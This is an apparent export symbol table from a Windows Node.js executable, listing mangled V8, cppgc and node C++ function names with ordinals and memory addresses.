                                                                                                                                                                                                        ?ForOrderedHashMapOrSetNumberOfDeletedElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67260x14108b5d0
                                                                                                                                                                                                        ?ForOrderedHashMapOrSetNumberOfElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67270x14108b630
                                                                                                                                                                                                        ?ForPropertyArrayLengthAndHash@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67280x14108b690
                                                                                                                                                                                                        ?ForScopeInfoFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67290x14108b690
                                                                                                                                                                                                        ?ForScriptCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@VScript@23@@Z67300x1407b2830
                                                                                                                                                                                                        ?ForSeqOneByteStringCharacter@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ67310x14108b6f0
                                                                                                                                                                                                        ?ForSeqTwoByteStringCharacter@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ67320x14108b740
                                                                                                                                                                                                        ?ForSlicedStringOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67330x14108a520
                                                                                                                                                                                                        ?ForSlicedStringParent@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67340x141089d50
                                                                                                                                                                                                        ?ForSloppyArgumentsElementsArguments@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67350x14108b400
                                                                                                                                                                                                        ?ForSloppyArgumentsElementsContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67360x14108b790
                                                                                                                                                                                                        ?ForSloppyArgumentsElementsMappedEntry@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ67370x14108b7e0
                                                                                                                                                                                                        ?ForStackArgument@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ67380x14108b820
                                                                                                                                                                                                        ?ForStringLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67390x14108b860
                                                                                                                                                                                                        ?ForTest@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@@Z67400x1407b2920
                                                                                                                                                                                                        ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBD@Z67410x140770da0
                                                                                                                                                                                                        ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBD_K@Z67420x140770e40
                                                                                                                                                                                                        ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBG_K@Z67430x140770ed0
                                                                                                                                                                                                        ?ForThinStringActual@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67440x141089d50
                                                                                                                                                                                                        ?ForToplevelCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@_NW4LanguageMode@23@W4REPLMode@23@W4ScriptType@3@1@Z67450x1407b2940
                                                                                                                                                                                                        ?ForToplevelFunction@ParseInfo@internal@v8@@SA?AV?$unique_ptr@VParseInfo@internal@v8@@U?$default_delete@VParseInfo@internal@v8@@@std@@@std@@VUnoptimizedCompileFlags@23@PEAVUnoptimizedCompileState@23@PEBVFunctionLiteral@23@PEBVAstRawString@23@@Z67460x1407b29f0
                                                                                                                                                                                                        ?ForToplevelFunction@UnoptimizedCompileFlags@internal@v8@@SA?AV123@V123@PEBVFunctionLiteral@23@@Z67470x1407b2a70
                                                                                                                                                                                                        ?ForTypedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@W4ExternalArrayType@34@_NW4LoadSensitivity@34@@Z67480x14108b8c0
                                                                                                                                                                                                        ?ForWeakFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ67490x14108a380
                                                                                                                                                                                                        ?ForWeakFixedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67500x14108b9e0
                                                                                                                                                                                                        ?ForWeakFixedArraySlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@H@Z67510x14108ba40
                                                                                                                                                                                                        ?ForceCompactionForNextGarbageCollection@StandaloneTestingHeap@testing@cppgc@@QEAAXXZ67520x1404517a0
                                                                                                                                                                                                        ?ForceContextAllocationForParameters@Scope@internal@v8@@QEAAXXZ67530x1406eb440
                                                                                                                                                                                                        ?ForceContextForLanguageMode@Scope@internal@v8@@QEBA_NXZ67540x1406eb450
                                                                                                                                                                                                        ?ForceEagerCompilation@DeclarationScope@internal@v8@@QEAAXXZ67550x1406eb470
                                                                                                                                                                                                        ?ForceGarbageCollectionSlow@Heap@cppgc@@QEAAXPEBD0W4EmbedderStackState@2@@Z67560x140462eb0
                                                                                                                                                                                                        ?Format@ErrorThrower@wasm@internal@v8@@AEAAXW4ErrorType@1234@PEBDPEAD@Z67570x14052b410
                                                                                                                                                                                                        ?Format@MessageFormatter@internal@v8@@SA?AV?$MaybeHandle@VString@internal@v8@@@23@PEAVIsolate@23@W4MessageTemplate@23@V?$Handle@VString@internal@v8@@@23@22@Z67580x140a04cc0
                                                                                                                                                                                                        ?FormatError@WasmError@wasm@internal@v8@@KA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBDPEAD@Z67590x14052b490
                                                                                                                                                                                                        ?FormatErrorMessageForTest@PendingCompilationErrorHandler@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@PEAVIsolate@23@@Z67600x1407a24c0
                                                                                                                                                                                                        ?FoundHtmlComment@Scanner@internal@v8@@QEBA_NXZ67610x140483ea0
                                                                                                                                                                                                        ?FrameFunctionCount@StackTraceFrameIterator@internal@v8@@QEBAHXZ67620x140a20e70
                                                                                                                                                                                                        ?FrameState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VBytecodeOffset@34@VOutputFrameStateCombine@234@PEBVFrameStateFunctionInfo@234@@Z67630x140eb36a0
                                                                                                                                                                                                        ?FrameStateCount@CallDescriptor@compiler@internal@v8@@QEBA_KXZ67640x1404bbc20
                                                                                                                                                                                                        ?Free@FreeListManyCached@internal@v8@@UEAA_K_K0W4FreeMode@23@@Z67650x1409cd270
                                                                                                                                                                                                        ?Free@InvalidatedSlotsCleanup@internal@v8@@QEAAX_K0@Z67660x140953010
                                                                                                                                                                                                        ?Free@NormalPageMemoryRegion@internal@cppgc@@QEAAXPEAE@Z67670x140458bf0
                                                                                                                                                                                                        ?Free@OS@base@v8@@CA_NPEAX_K@Z67680x140e5ffa0
                                                                                                                                                                                                        ?Free@PagedSpace@internal@v8@@QEAA_K_K0W4SpaceAccountingMode@23@@Z67690x140483eb0
                                                                                                                                                                                                        ?Free@VirtualMemory@internal@v8@@QEAAXXZ67700x1406b5720
                                                                                                                                                                                                        ?FreeArrayBufferAllocator@node@@YAXPEAVArrayBufferAllocator@1@@Z67710x140078bc0
                                                                                                                                                                                                        ?FreeBufferMemory@Delegate@ValueSerializer@v8@@UEAAXPEAX@Z67720x1402948a0
                                                                                                                                                                                                        ?FreeCode@NativeModule@wasm@internal@v8@@QEAAXV?$Vector@QEAVWasmCode@wasm@internal@v8@@@base@4@@Z67730x14056b2c0
                                                                                                                                                                                                        ?FreeCurrentEmbeddedBlob@internal@v8@@YAXXZ67740x140a11080
                                                                                                                                                                                                        ?FreeDeadCode@WasmEngine@wasm@internal@v8@@QEAAXAEBV?$unordered_map@PEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@U?$hash@PEAVNativeModule@wasm@internal@v8@@@6@U?$equal_to@PEAVNativeModule@wasm@internal@v8@@@6@V?$allocator@U?$pair@QEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@@std@@@6@@std@@@Z67750x1405567e0
                                                                                                                                                                                                        ?FreeDeadCodeLocked@WasmEngine@wasm@internal@v8@@QEAAXAEBV?$unordered_map@PEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@U?$hash@PEAVNativeModule@wasm@internal@v8@@@6@U?$equal_to@PEAVNativeModule@wasm@internal@v8@@@6@V?$allocator@U?$pair@QEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@@std@@@6@@std@@@Z67760x140556830
                                                                                                                                                                                                        ?FreeDebugInfoListNode@Debug@internal@v8@@AEAAXPEAVDebugInfoListNode@23@0@Z67770x140a604d0
                                                                                                                                                                                                        ?FreeEnvironment@node@@YAXPEAVEnvironment@1@@Z67780x14028c8a0
                                                                                                                                                                                                        ?FreeIsolateData@node@@YAXPEAVIsolateData@1@@Z67790x140078bc0
                                                                                                                                                                                                        ?FreeLargePageMemory@PageBackend@internal@cppgc@@QEAAXPEAE@Z67800x140458ce0
                                                                                                                                                                                                        ?FreeLinearAllocationArea@LocalHeap@internal@v8@@QEAAXXZ67810x1409a36a0
                                                                                                                                                                                                        ?FreeLinearAllocationArea@PagedSpace@internal@v8@@QEAAXXZ67820x140964b90
                                                                                                                                                                                                        ?FreeListAddRegion@RegionAllocator@base@v8@@AEAAXPEAVRegion@123@@Z67830x140e6cc00
                                                                                                                                                                                                        ?FreeListFindRegion@RegionAllocator@base@v8@@AEAAPEAVRegion@123@_K@Z67840x140e6cd00
                                                                                                                                                                                                        ?FreeListRemoveRegion@RegionAllocator@base@v8@@AEAAXPEAVRegion@123@@Z67850x140e6cd40
                                                                                                                                                                                                        ?FreeNativeModule@WasmCodeManager@wasm@internal@v8@@AEAAXV?$Vector@VVirtualMemory@internal@v8@@@base@4@_K@Z67860x14056b770
                                                                                                                                                                                                        ?FreeNativeModule@WasmEngine@wasm@internal@v8@@QEAAXPEAVNativeModule@234@@Z67870x140556c20
                                                                                                                                                                                                        ?FreeNode@CrossThreadPersistentRegion@internal@cppgc@@QEAAXPEAVPersistentNode@23@@Z67880x14044fcd0
                                                                                                                                                                                                        ?FreeNode@PersistentRegion@internal@cppgc@@QEAAXPEAVPersistentNode@23@@Z67890x14044fd10
                                                                                                                                                                                                        ?FreeNormalPageMemory@PageBackend@internal@cppgc@@QEAAX_KPEAE@Z67900x140458e80
                                                                                                                                                                                                        ?FreePages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z67910x140e68b10
                                                                                                                                                                                                        ?FreePages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z67920x140e63620
                                                                                                                                                                                                        ?FreePages@internal@v8@@YA_NPEAVPageAllocator@2@PEAX_K@Z67930x1406b57f0
                                                                                                                                                                                                        ?FreePlatform@node@@YAXPEAVMultiIsolatePlatform@1@@Z67940x140078bc0
                                                                                                                                                                                                        ?FreeQueuedChunks@Unmapper@MemoryAllocator@internal@v8@@QEAAXXZ67950x140974e40
                                                                                                                                                                                                        ?FreeReadOnly@VirtualMemory@internal@v8@@QEAAXXZ67960x1406b5800
                                                                                                                                                                                                        ?FreeRegion@RegionAllocator@base@v8@@QEAA_K_K@Z67970x140e68bb0
                                                                                                                                                                                                        ?FreeThreadResources@Debug@internal@v8@@QEAAXXZ67980x140078990
                                                                                                                                                                                                        ?FreeThreadResources@Isolate@internal@v8@@QEAAXXZ67990x140483f40
                                                                                                                                                                                                        ?FreeThreadResources@StackGuard@internal@v8@@QEAAXXZ68000x140a009d0
                                                                                                                                                                                                        ?FreeUnmarkedObjects@LargeObjectSpace@internal@v8@@UEAAXXZ68010x1409a5450
                                                                                                                                                                                                        ?FreeUnreferencedObject@internal@cppgc@@YAXAEAVHeapHandle@2@PEAX@Z68020x140467100
                                                                                                                                                                                                        ?Freeze@SignatureMap@wasm@internal@v8@@QEAAXXZ68030x14011fc80
                                                                                                                                                                                                        ?From@CppHeap@internal@v8@@SAPEAV123@PEAV13@@Z68040x14044fd30
                                                                                                                                                                                                        ?From@CppHeap@internal@v8@@SAPEBV123@PEBV13@@Z68050x14044fd30
                                                                                                                                                                                                        ?From@GlobalHandles@internal@v8@@CAPEAV123@PEBVTracedNode@123@@Z68060x1409f60e0
                                                                                                                                                                                                        ?From@Heap@internal@cppgc@@SAPEAV123@PEAV13@@Z68070x14044fd30
                                                                                                                                                                                                        ?From@Heap@internal@cppgc@@SAPEBV123@PEBV13@@Z68080x14044fd30
                                                                                                                                                                                                        ?From@HeapBase@internal@cppgc@@SAAEAV123@AEAVHeapHandle@3@@Z68090x14044fd50
                                                                                                                                                                                                        ?From@HeapBase@internal@cppgc@@SAAEBV123@AEBVHeapHandle@3@@Z68100x14044fd50
                                                                                                                                                                                                        ?From@LargePage@internal@cppgc@@SAPEAV123@PEAVBasePage@23@@Z68110x140078ac0
                                                                                                                                                                                                        ?From@LargePage@internal@cppgc@@SAPEBV123@PEBVBasePage@23@@Z68120x140078ac0
                                                                                                                                                                                                        ?From@LargePageSpace@internal@cppgc@@SAAEAV123@AEAVBaseSpace@23@@Z68130x140078ac0
                                                                                                                                                                                                        ?From@LargePageSpace@internal@cppgc@@SAAEBV123@AEBVBaseSpace@23@@Z68140x140078ac0
                                                                                                                                                                                                        ?From@NormalPage@internal@cppgc@@SAPEAV123@PEAVBasePage@23@@Z68150x140078ac0
                                                                                                                                                                                                        ?From@NormalPage@internal@cppgc@@SAPEBV123@PEBVBasePage@23@@Z68160x140078ac0
                                                                                                                                                                                                        ?From@NormalPageSpace@internal@cppgc@@SAAEAV123@AEAVBaseSpace@23@@Z68170x140078ac0
                                                                                                                                                                                                        ?From@NormalPageSpace@internal@cppgc@@SAAEBV123@AEBVBaseSpace@23@@Z68180x140078ac0
                                                                                                                                                                                                        ?FromAddress@Bitmap@internal@v8@@SAPEAV123@_K@Z68190x140078ac0
                                                                                                                                                                                                        ?FromBackgroundThread@NexusConfig@internal@v8@@SA?AV123@PEAVIsolate@23@PEAVLocalHeap@23@@Z68200x140450cf0
                                                                                                                                                                                                        ?FromByte@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@E@Z68210x140483f50
                                                                                                                                                                                                        ?FromCompiledModule@WasmModuleObject@v8@@SA?AV?$MaybeLocal@VWasmModuleObject@v8@@@2@PEAVIsolate@2@AEBVCompiledWasmModule@2@@Z68220x140b12540
                                                                                                                                                                                                        ?FromContext@WasmFeatures@wasm@internal@v8@@SA?AV1234@PEAVIsolate@34@V?$Handle@VContext@internal@v8@@@34@@Z68230x14054fbf0
                                                                                                                                                                                                        ?FromCurrentPage@PagedSpaceObjectIterator@internal@v8@@AEAA?AVHeapObject@23@XZ68240x140483f60
                                                                                                                                                                                                        ?FromDays@TimeDelta@base@v8@@SA?AV123@H@Z68250x140e5ffc0
                                                                                                                                                                                                        ?FromDouble@TimeDelta@base@v8@@CA?AV123@N@Z68260x140e5ffe0
                                                                                                                                                                                                        ?FromFiletime@Time@base@v8@@SA?AV123@U_FILETIME@@@Z68270x140e62410
                                                                                                                                                                                                        ?FromHandle@FeedbackNexus@internal@v8@@AEBA?AVMaybeObject@23@VMaybeObjectHandle@23@@Z68280x140484010
                                                                                                                                                                                                        ?FromHeap@Isolate@internal@v8@@SAPEAV123@PEAVHeap@23@@Z68290x140475650
                                                                                                                                                                                                        ?FromHeap@LocalIsolate@internal@v8@@SAPEAV123@PEAVLocalHeap@23@@Z68300x140484040
                                                                                                                                                                                                        ?FromHours@TimeDelta@base@v8@@SA?AV123@H@Z68310x140e60040
                                                                                                                                                                                                        ?FromInnerAddress@BasePage@internal@cppgc@@SAPEAV123@PEBVHeapBase@23@PEAX@Z68320x140464940
                                                                                                                                                                                                        ?FromInnerAddress@BasePage@internal@cppgc@@SAPEBV123@PEBVHeapBase@23@PEBX@Z68330x140464940
                                                                                                                                                                                                        ?FromInt64@BigInt@internal@v8@@SA?AV?$Handle@VBigInt@internal@v8@@@23@PEAVIsolate@23@_J@Z68340x1408c6750
                                                                                                                                                                                                        ?FromInternalValue@?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@SA?AVThreadTicks@34@_J@Z68350x140078b40
                                                                                                                                                                                                        ?FromInternalValue@?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@SA?AVTime@34@_J@Z68360x140078b40
                                                                                                                                                                                                        ?FromInternalValue@?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@SA?AVTimeTicks@34@_J@Z68370x140078b40
                                                                                                                                                                                                        ?FromIsolate@WasmFeatures@wasm@internal@v8@@SA?AV1234@PEAVIsolate@34@@Z68380x14054fe00
                                                                                                                                                                                                        ?FromJsTime@Time@base@v8@@SA?AV123@N@Z68390x140e62490
                                                                                                                                                                                                        ?FromJustIsNothing@V8@v8@@CAXXZ68400x140b125d0
                                                                                                                                                                                                        ?FromMainThread@NexusConfig@internal@v8@@SA?AV123@PEAVIsolate@23@@Z68410x14047cef0
                                                                                                                                                                                                        ?FromMicroseconds@TimeDelta@base@v8@@SA?AV123@_J@Z68420x140078b40
                                                                                                                                                                                                        ?FromMilliseconds@TimeDelta@base@v8@@SA?AV123@_J@Z68430x140e60060
                                                                                                                                                                                                        ?FromMillisecondsD@TimeDelta@base@v8@@SA?AV123@N@Z68440x140e60070
                                                                                                                                                                                                        ?FromMinutes@TimeDelta@base@v8@@SA?AV123@H@Z68450x140e600e0
                                                                                                                                                                                                        ?FromNanoseconds@TimeDelta@base@v8@@SA?AV123@_J@Z68460x140e60100
                                                                                                                                                                                                        ?FromNumber@BigInt@internal@v8@@SA?AV?$MaybeHandle@VBigInt@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z68470x1408c67f0
                                                                                                                                                                                                        ?FromOperand@Register@interpreter@internal@v8@@SA?AV1234@H@Z68480x140484050
                                                                                                                                                                                                        ?FromParameterIndex@Register@interpreter@internal@v8@@SA?AV1234@HH@Z68490x1408f77b0
                                                                                                                                                                                                        ?FromPayload@BasePage@internal@cppgc@@SAPEAV123@PEAX@Z68500x14044fd60
                                                                                                                                                                                                        ?FromPayload@BasePage@internal@cppgc@@SAPEBV123@PEBX@Z68510x14044fd60
                                                                                                                                                                                                        ?FromRawAddress@ExternalReference@internal@v8@@SA?AV123@_K@Z68520x140078b40
                                                                                                                                                                                                        ?FromRootAddress@Isolate@internal@v8@@SAPEAV123@_K@Z68530x140484060
                                                                                                                                                                                                        ?FromSeconds@TimeDelta@base@v8@@SA?AV123@_J@Z68540x140e60130
                                                                                                                                                                                                        ?FromSecondsD@TimeDelta@base@v8@@SA?AV123@N@Z68550x140e60140
                                                                                                                                                                                                        ?FromShortStar@Register@interpreter@internal@v8@@SA?AV1234@W4Bytecode@234@@Z68560x140484070
                                                                                                                                                                                                        ?FromSnapshot@Context@v8@@SA?AV?$MaybeLocal@VContext@v8@@@2@PEAVIsolate@2@_KUDeserializeInternalFieldsCallback@2@PEAVExtensionConfiguration@2@V?$MaybeLocal@VValue@v8@@@2@PEAVMicrotaskQueue@2@@Z68570x140b12640
                                                                                                                                                                                                        ?FromSpaceContains@NewSpace@internal@v8@@QEBA_NVObject@23@@Z68580x140484080
                                                                                                                                                                                                        ?FromTypeBase@Type@compiler@internal@v8@@CA?AV1234@PEAVTypeBase@234@@Z68590x140078b40
                                                                                                                                                                                                        ?FroundType@AsmType@wasm@internal@v8@@SAPEAV1234@PEAVZone@34@@Z68600x1406328d0
                                                                                                                                                                                                        ?Fulfill@JSPromise@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VJSPromise@internal@v8@@@23@V423@@Z68610x1407f81b0
                                                                                                                                                                                                        ?FulfillPromise@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68620x140f3c6d0
                                                                                                                                                                                                        ?FullIsNull@Value@v8@@AEBA_NXZ68630x140b126f0
                                                                                                                                                                                                        ?FullIsString@Value@v8@@AEBA_NXZ68640x140b12720
                                                                                                                                                                                                        ?FullIsUndefined@Value@v8@@AEBA_NXZ68650x140b12740
                                                                                                                                                                                                        ?Function@AsmType@wasm@internal@v8@@SAPEAV1234@PEAVZone@34@PEAV1234@@Z68660x140632920
                                                                                                                                                                                                        ?Function@SourceLocation@cppgc@@QEBAPEBDXZ68670x140078aa0
                                                                                                                                                                                                        ?Function@Type@compiler@internal@v8@@SA?AV1234@XZ68680x1404bbc30
                                                                                                                                                                                                        ?FunctionCount@ScriptData@Coverage@debug@v8@@QEBA_KXZ68690x140a6f0a0
                                                                                                                                                                                                        ?FunctionForId@Runtime@internal@v8@@SAPEBUFunction@123@W4FunctionId@123@@Z68700x1406dd360
                                                                                                                                                                                                        ?FunctionKindFor@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4FunctionKind@23@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@@Z68710x140775070
                                                                                                                                                                                                        ?FunctionKindForImpl@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4FunctionKind@23@W4SubFunctionKind@123@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@@Z68720x140775090
                                                                                                                                                                                                        ?FunctionName@ScopeInfo@internal@v8@@QEBA?AVObject@23@XZ68730x1407dc550
                                                                                                                                                                                                        ?FunctionProtoToString@Function@v8@@QEAA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z68740x140b12770
                                                                                                                                                                                                        ?Function_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ68750x1404840d0
                                                                                                                                                                                                        ?Function_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ68760x1406cdc40
                                                                                                                                                                                                        ?FuseFloatingControl@Scheduler@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@PEAVNode@234@@Z68770x141051810
                                                                                                                                                                                                        ?GCInfoFromIndex@GCInfoTable@internal@cppgc@@QEBAAEBUGCInfo@23@G@Z68780x14044fd70
                                                                                                                                                                                                        ?GCInfoFromIndex@GlobalGCInfoTable@internal@cppgc@@SAAEBUGCInfo@23@G@Z68790x14044fd80
                                                                                                                                                                                                        ?GarbageCollectionForTesting@EmbedderHeapTracer@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z68800x140b12d70
                                                                                                                                                                                                        ?GeneralizeField@MapUpdater@internal@v8@@AEAAXV?$Handle@VMap@internal@v8@@@23@VInternalIndex@23@W4PropertyConstness@23@VRepresentation@23@V?$Handle@VFieldType@internal@v8@@@23@@Z68810x140818200
                                                                                                                                                                                                        ?GeneralizeField@MapUpdater@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@VInternalIndex@23@W4PropertyConstness@23@VRepresentation@23@V?$Handle@VFieldType@internal@v8@@@23@@Z68820x140818220
                                                                                                                                                                                                        ?GenerateCode@CodeAssembler@compiler@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVCodeAssemblerState@234@AEBUAssemblerOptions@34@PEBVProfileDataFromFile@34@@Z68830x140f22a30
                                                                                                                                                                                                        ?GenerateCodeForTesting@Pipeline@compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@34@PEAVOptimizedCompilationInfo@34@PEAVIsolate@34@PEAV?$unique_ptr@VJSHeapBroker@compiler@internal@v8@@U?$default_delete@VJSHeapBroker@compiler@internal@v8@@@std@@@std@@@Z68840x140f11ce0
                                                                                                                                                                                                        ?GenerateCodeForTesting@Pipeline@compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@34@PEAVOptimizedCompilationInfo@34@PEAVIsolate@34@PEAVCallDescriptor@234@PEAVGraph@234@AEBUAssemblerOptions@34@PEAVSchedule@234@@Z68850x140f12010
                                                                                                                                                                                                        ?GenerateDeoptimizationData@CodeGenerator@compiler@internal@v8@@AEAA?AV?$Handle@VDeoptimizationData@internal@v8@@@34@XZ68860x140ee79a0
                                                                                                                                                                                                        ?GenerateDominatorTree@Scheduler@compiler@internal@v8@@AEAAXXZ68870x141051f00
                                                                                                                                                                                                        ?GenerateDominatorTree@Scheduler@compiler@internal@v8@@SAXPEAVSchedule@234@@Z68880x141051f30
                                                                                                                                                                                                        ?GenerateFarJumpTable@JumpTableAssembler@wasm@internal@v8@@SAX_KPEA_KHH@Z68890x14052fcb0
                                                                                                                                                                                                        ?GenerateIdentityHash@Isolate@internal@v8@@QEAAHI@Z68900x140a111c0
                                                                                                                                                                                                        ?GenerateLazyCompileTable@JumpTableAssembler@wasm@internal@v8@@SAX_KII0@Z68910x14052fd70
                                                                                                                                                                                                        ?GenerateLiftoffDebugSideTable@wasm@internal@v8@@YA?AV?$unique_ptr@VDebugSideTable@wasm@internal@v8@@U?$default_delete@VDebugSideTable@wasm@internal@v8@@@std@@@std@@PEBVWasmCode@123@@Z68920x1405ffd70
                                                                                                                                                                                                        ?GenerateSpeculationPoisonFromCodeStartRegister@CodeGenerator@compiler@internal@v8@@AEAAXXZ68930x1404fede0
                                                                                                                                                                                                        ?GenerationSizesFromHeapSize@Heap@internal@v8@@SAX_KPEA_K1@Z68940x1409b7490
                                                                                                                                                                                                        ?GenerationalBarrier@JSHeapConsistency@v8@@SAXAEBUParams@WriteBarrier@internal@cppgc@@AEBVTracedReferenceBase@2@@Z68950x140078990
                                                                                                                                                                                                        ?GenerationalBarrier@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX@Z68960x140078990
                                                                                                                                                                                                        ?GenerationalBarrierForCodeSlow@Heap@internal@v8@@SAXVCode@23@PEAVRelocInfo@23@VHeapObject@23@@Z68970x1409b7540
                                                                                                                                                                                                        ?GenerationalBarrierSlow@Heap@internal@v8@@SAXVHeapObject@23@_K0@Z68980x1409b75d0
                                                                                                                                                                                                        ?GeneratorRestoreContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68990x140f3c6e0
                                                                                                                                                                                                        ?GeneratorRestoreContinuation@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ69000x140f3c6f0
                                                                                                                                                                                                        ?GeneratorRestoreInputOrDebugPos@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ69010x140f3c700
                                                                                                                                                                                                        ?GeneratorRestoreRegister@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z69020x140f3c710
                                                                                                                                                                                                        ?GeneratorStore@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z69030x140f3c7d0
                                                                                                                                                                                                        ?Generator_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ69040x1404840e0
                                                                                                                                                                                                        ?Generator_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ69050x1406cdc50
                                                                                                                                                                                                        ?Get@BasicBlockProfiler@internal@v8@@SAPEAV123@XZ69060x140a46880
                                                                                                                                                                                                        ?Get@ConsString@internal@v8@@QEBAGHAEBVSharedStringAccessGuardIfNeeded@23@@Z69070x1407c3f90
                                                                                                                                                                                                        ?Get@DynamicBitSet@internal@v8@@QEBA_NI@Z69080x14072ed10
                                                                                                                                                                                                        ?Get@FixedArray@v8@@QEBA?AV?$Local@VData@v8@@@2@V?$Local@VContext@v8@@@2@H@Z69090x140b12e40
                                                                                                                                                                                                        ?Get@FlatStringReader@internal@v8@@QEBAIH@Z69100x1404840f0
                                                                                                                                                                                                        ?Get@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@H@Z69110x140a20f20
                                                                                                                                                                                                        ?Get@GlobalGCInfoTable@internal@cppgc@@SAAEBVGCInfoTable@23@XZ69120x14044fda0
                                                                                                                                                                                                        ?Get@Map@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z69130x140b12ef0
                                                                                                                                                                                                        ?Get@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ69140x140b13220
                                                                                                                                                                                                        ?Get@NativeContextStats@internal@v8@@QEBA_K_K@Z69150x140484110
                                                                                                                                                                                                        ?Get@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@I@Z69160x140b13410
                                                                                                                                                                                                        ?Get@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z69170x140b13730
                                                                                                                                                                                                        ?Get@PrimitiveArray@v8@@QEAA?AV?$Local@VPrimitive@v8@@@2@PEAVIsolate@2@H@Z69180x140b13a00
                                                                                                                                                                                                        ?Get@SlicedString@internal@v8@@QEBAGHAEBVSharedStringAccessGuardIfNeeded@23@@Z69190x1407c4070
                                                                                                                                                                                                        ?Get@StubCache@internal@v8@@QEAA?AVMaybeObject@23@VName@23@VMap@23@@Z69200x14093fbe0
                                                                                                                                                                                                        ?Get@ThinString@internal@v8@@QEBAGHAEBVSharedStringAccessGuardIfNeeded@23@@Z69210x1407c40c0
                                                                                                                                                                                                        ?Get@TypeCache@compiler@internal@v8@@SAPEBV1234@XZ69220x14109b7f0
